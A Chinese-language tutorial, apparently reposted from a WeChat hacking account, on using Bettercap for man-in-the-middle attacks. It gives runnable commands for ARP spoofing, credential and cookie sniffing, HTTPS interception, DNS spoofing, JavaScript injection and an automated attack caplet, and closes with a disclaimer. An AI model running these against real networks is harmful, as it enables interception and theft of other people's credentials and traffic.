网络流量的瑞士军刀：Bettercap（中间人攻击神器）

用心做分享，只为给您最好的学习教程

如果您觉得文章不错，欢迎持续学习

如果你还在为Ettercap的年迈老气发愁、或者其他中间人攻击工具的繁琐配置而头疼，那么Bettercap绝对是你工具库中不可或缺的瑞士军刀。它不仅能帮你轻松实现中间人攻击（MITM），更能让你在网络流量中“为所欲为”！

🔥 Bettercap：不止中间人攻击工具，更是玩转流量的瑞士军刀 🔥

🤔 什么是Bettercap？

Bettercap可不是什么善茬！它是一个功能强大、模块化、可移植且易于扩展的网络嗅探和中间人攻击框架。你可以把它想象成一个集成了多种网络攻击与分析工具的平台。最初它可能是作为Ettercap的替代品出现的，但发展至今，早已青出于蓝而胜于蓝。

用Go语言编写，意味着它天生具有良好的跨平台性和性能。其模块化的设计，让你可以像搭积木一样组合各种功能，实现复杂的攻击链路。

🌟 为什么选择Bettercap？它牛在哪里？

1. 一站式解决方案
   
   ：从网络发现、ARP欺骗、DNS欺骗，到HTTP(S)流量嗅探与修改、数据包捕获、WiFi破解、蓝牙设备侦察……它几乎无所不能。
2. 模块化与可编程
   
   ：内置N多模块，还能通过Caplets（脚本）进行自动化和定制化操作。
3. 强大的实时嗅探与修改
   
   ：能够实时捕获网络中的敏感信息（如密码、Cookie），甚至注入自定义内容。
4. Web UI界面
   
   ：除了命令行，还提供了直观的Web用户界面，让操作更加便捷。
5. 活跃的社区与更新
   
   ：项目持续更新迭代，不断有新功能和特性加入。

🛠️ Bettercap安装与上手实战 (保姆级图文教程) 🛠️

第一步：安装Bettercap (选择你喜欢的方式)

• 方式一：直接下载预编译二进制文件 (推荐，最省心)

  访问 Bettercap 的 GitHub Releases 页面 (https://github.com/bettercap/bettercap/releases)，根据你的操作系统下载最新版本的压缩包。解压后即可直接运行。

• 方式二：使用 go install (如果你有Go环境)

  go install github.com/bettercap/bettercap@latest# 确保你的 $GOPATH/bin 在系统PATH中

• 方式三：包管理器 (如Kali Linux)

  sudo apt updatesudo apt install bettercap -y

  (注意：包管理器中的版本可能不是最新的)

安装完成后，打开终端，输入 sudo bettercap -version (需要sudo权限来操作网络接口和进行原始套接字操作) 来验证安装。

第二步：启动Bettercap与初识交互界面

直接在终端输入 sudo bettercap 即可启动Bettercap的交互式会话。

你会看到一个类似 >> 的提示符。在这里，你可以输入各种命令来控制Bettercap的行为。 常用命令：

help：查看所有可用模块和命令。help <module_name>：查看特定模块的详细帮助信息（如 help net.sniff）。active：显示当前活动模块及其状态。quit 或 exit：退出Bettercap。

第三步：核心模块实战演练 (前方高能！)

Bettercap的核心在于其强大的模块。我们来一步步演练最经典的中间人攻击流程：

1. 网络主机发现 (net.recon) - 摸清家底 🎯 这个模块用于发现局域网内的存活主机。

   >> net.recon on

   稍等片刻，Bettercap会自动探测网络。你可以使用 net.show 查看发现的主机列表。

   >> net.show

2. ARP欺骗 (arp.spoof) - 掌握流量咽喉 ⚔️ 

   这是实现中间人攻击的关键步骤。它会欺骗目标主机和网关，让它们的流量都经过你的机器。

   Bettercap会持续发送ARP欺骗包。此时，目标主机的流量理论上已经流经你的设备了。

• 设置目标
  
  ：你可以选择欺骗整个子网，或者指定特定目标。

  # 欺骗特定目标 (例如192.168.1.101)，让其流量经过你>> set arp.spoof.targets 192.168.1.101# 如果想欺骗整个子网（谨慎！），通常需要设置 fullduplex# >> set arp.spoof.fullduplex true# >> set arp.spoof.targets 192.168.1.1 (假设网关是192.168.1.1)

• 启动欺骗
  
  ：

  >> arp.spoof on

1. 流量嗅探 (net.sniff) - 开始“窃听” 🕵️‍♂️ 一旦ARP欺骗成功，就可以开启嗅探器来捕获流经你设备的数据包了。

   >> net.sniff on

   Bettercap会实时显示捕获到的敏感信息，比如HTTP POST请求中的用户名密码、Cookies等。

• 设置过滤器 (可选)
  
  ：如果你只想关注特定流量，可以使用过滤器。

  # 例如，只抓取80端口的TCP流量

  >> set net.sniff.filter tcp port 80# 清除过滤器>> set net.sniff.filter

2. HTTP/HTTPS代理 (http.proxy, https.proxy) - 更深层次的流量操纵 PROXY 这两个模块可以将你的设备变成一个HTTP或HTTPS代理，从而拦截和修改Web流量。

• HTTP代理
  
  ：

  >> http.proxy on

  可以配合 set http.proxy.injectjs <JS_URL_or_File> 注入JavaScript代码。

• HTTPS代理 (涉及SSL证书)
  
  ：

  >> https.proxy on

  当启用HTTPS代理时，Bettercap会自动生成SSL证书。目标浏览器访问HTTPS网站时会收到证书警告（因为证书是自签名的）。如果用户忽略警告继续访问，你就能解密并查看HTTPS流量了。 ⚠️ 注意：HTTPS代理的滥用可能导致严重隐私泄露，请负责任地使用。

1. DNS欺骗 (dns.spoof) - 指鹿为马 🎣 这个模块可以让你伪造DNS响应，将特定域名解析到你指定的IP地址。常用于钓鱼攻击。

   现在，当被ARP欺骗的目标主机尝试访问被你配置的域名时，会被导向你指定的IP。

• 配置
  
  ：

  # 将所有域名解析到你的IP (假设你的IP是192.168.1.100)>> set dns.spoof.all true>> set dns.spoof.address 192.168.1.100# 或者只针对特定域名# >> set dns.spoof.domains example.com,*.test.org# >> set dns.spoof.address 192.168.1.100启动：>> dns.spoof on

停止模块：想关闭某个模块，只需将 on 替换为 off，例如 arp.spoof off。

第四步：优雅的Web UI界面

Bettercap还提供了一个非常赞的Web界面，让操作更加直观。 启动API服务和Web服务器：

>> api.rest on>> http.server on# 或者在较新版本中，可能直接有 ui 命令# >> ui

然后浏览器访问 http://127.0.0.1 (或者Bettercap提示的端口)，输入默认凭据（通常是 user:pass，首次登录会提示你修改）即可进入Web UI。

在Web UI里，你可以图形化地启动/停止模块、查看目标、配置参数等，非常方便。

第五步：Caplets - 自动化你的“骚操作”

Caplet是Bettercap的脚本文件，后缀为 .cap。你可以预先写好一系列命令在caplet文件中，然后让Bettercap加载执行，实现自动化攻击。

例如，创建一个 mitm_basic.cap 文件：

# 开启网络发现net.recon on# 等待几秒让网络发现运行sleep 5# 设置ARP欺骗目标 (根据实际情况修改)set arp.spoof.targets 192.168.1.103, 192.168.1.105arp.spoof on# 开启嗅探net.sniff on# 开启HTTP代理并注入JS (假设你有一个evil.js)# set http.proxy.injectjs /path/to/your/evil.js# http.proxy on

启动Bettercap并加载caplet：

sudo bettercap -caplet /path/to/your/mitm_basic.cap

🚀 进阶玩法与思路 (点到为止)

Bettercap的潜力远不止于此：

• WiFi模块 (wifi.*)
  
  ：进行WiFi网络的探测、破解（如PMKID攻击）、Deauth攻击等。
• 蓝牙模块 (ble.recon, ble.enum)
  
  ：发现和枚举附近的蓝牙低功耗设备。
• JavaScript注入 (http.proxy.injectjs)
  
  ：配合BeEF等框架，实现对目标浏览器的控制。
• 自定义数据包过滤与修改
  
  ：更细致地操控网络流量。

⚠️ 郑重声明：技术无罪，滥用可耻！⚠️

本文介绍Bettercap仅为技术学习和网络安全研究目的。

• 严格遵守法律法规，请在授权环境下进行测试！
• 严禁将Bettercap用于任何非法攻击、侵犯隐私等恶意行为！
• 任何因滥用Bettercap造成的法律后果，均由使用者自行承担！

网络安全的核心在于攻防相长，了解攻击工具是为了更好地进行防御。

总结

Bettercap无疑是现代网络渗透测试中一款功能极为强大的瑞士军刀。它的模块化设计、易用性以及强大的功能，使其成为安全研究人员和渗透测试工程师的得力助手。

希望这篇“保姆级”教程能帮助你快速上手Bettercap。记住，工具本身没有好坏，关键在于使用它的人。实践出真知，但务必心存敬畏，坚守道德与法律底线！

对Bettercap还有什么疑问或者更酷的玩法？欢迎在评论区与我激情碰撞！👇 觉得干货满满？别忘了点赞、在看、分享，让更多小伙伴一起学习进步！Peace！😎

本文仅作技术分享 切勿用于非法途径

关注【黑客联盟】带你走进神秘的黑客世界

原文始发于微信公众号（黑客联盟l）：网络流量的瑞士军刀：Bettercap（中间人攻击神器）